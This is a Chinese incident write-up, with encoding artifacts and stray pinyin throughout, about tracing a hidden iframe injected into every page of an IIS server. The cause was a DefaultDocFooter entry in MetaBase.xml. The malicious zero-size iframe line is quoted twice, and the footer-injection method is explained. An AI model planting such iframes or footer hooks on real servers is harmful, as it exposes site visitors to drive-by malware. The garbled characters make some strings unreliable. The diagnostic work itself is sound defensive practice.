一臺(tái)服務(wù)器 幾乎所有網(wǎng)站打開(kāi)網(wǎng)頁(yè) 甚至HTML網(wǎng)頁(yè) 都出現(xiàn)了

<iframe src="http://xxxdfsfd/web.htm" height=0 width=0></iframe>

這種樣式的代碼 有的在頭部　有的在尾部 部分殺毒軟件打開(kāi)會(huì)報(bào)毒

打開(kāi)HTML或ASP PHP頁(yè)面 在源碼中怎么也找不到這段代碼

分析原因

首先懷疑ARP掛馬，用防ARP的工具又沒(méi)有發(fā)現(xiàn)有arp欺騙

而且arp欺騙一般不會(huì)每次都被插入代碼，而是時(shí)有時(shí)無(wú)

而且使用http://127.0.0.1 或者h(yuǎn)ttp://localhost 訪問(wèn)的時(shí)候也可以找到這段代碼

arp欺騙的可能排除。

然后就想到可能是JS被篡改，或者是其它的包含文件，查找后沒(méi)有發(fā)現(xiàn)被改的頁(yè)面 連新建的HTML頁(yè)面瀏覽的時(shí)候也會(huì)被插入這段代碼，那就只能是通過(guò)ＩＩＳ掛上去的了。

備份iis數(shù)據(jù)然后重裝iis，代碼消失，將備份的iis恢復(fù)，問(wèn)題又來(lái)了。

仔細(xì)尋找，問(wèn)題應(yīng)該出在IIS的配置文件上，打開(kāi)配置文件，沒(méi)有發(fā)現(xiàn)那段代碼。

那很有可能是調(diào)用了某個(gè)文件，這個(gè)怎么查啊，忽然想起了大名鼎鼎的Filemon

本地載了一個(gè)上傳到服務(wù)器上，打開(kāi)Filemon，數(shù)據(jù)太多了，過(guò)濾掉一些沒(méi)有用的

只留下iis的進(jìn)程，數(shù)據(jù)還是很多，看來(lái)服務(wù)器上的站點(diǎn)還是挺多人在訪問(wèn)的。

關(guān)掉所有站點(diǎn),建了一個(gè)測(cè)試站點(diǎn)anky 目錄為D:\www\　在下面建了一個(gè)空白頁(yè)面test.htm

訪問(wèn)一下這個(gè)頁(yè)面代碼被插進(jìn)來(lái)了，再看一下Filemon　奇怪怎么讀取C:\Inetpub\wwwroot\iisstart.htm

打開(kāi)C:\Inetpub\wwwroot\iisstart.htm一看，里面就躺著

<iframe src="http://xxxdfsfd/web.htm" height=0 width=0></iframe>

把代碼刪除了留空，訪問(wèn)test.htm 正常了，把C:\Inetpub\wwwroot\iisstart.htm刪除了再訪問(wèn)

test.htm　出現(xiàn)　“讀取數(shù)據(jù)頁(yè)腳文件出錯(cuò)”問(wèn)題就出這里了，看來(lái)是調(diào)用了

這個(gè)文件。

把C:\Inetpub\wwwroot\iisstart.htm清空就正常了，這樣怎么行，解決問(wèn)題當(dāng)然要連根拔掉。

continue

有沒(méi)有可能是擴(kuò)展造成的，到擴(kuò)展中檢查了一遍全部都是正常的

當(dāng)然 通過(guò)ISAPI 掛馬的也是存在的

左想右想最后還是覺(jué)得配置文件有問(wèn)題

打開(kāi)配置文件，配置文件在%windir%\system32\inetsrv\MetaBase.xml

用記事本打開(kāi)，查找iisstart.htm　找到一行，開(kāi)始以為是默認(rèn)站點(diǎn)，后來(lái)一想不對(duì)啊

默認(rèn)站點(diǎn)都刪除了，再仔細(xì)一看這句代碼為

DefaultDocFooter="FILE:C:\Inetpub\wwwroot\iisstart.htm"

刪除掉這一行，問(wèn)題徹底解決了。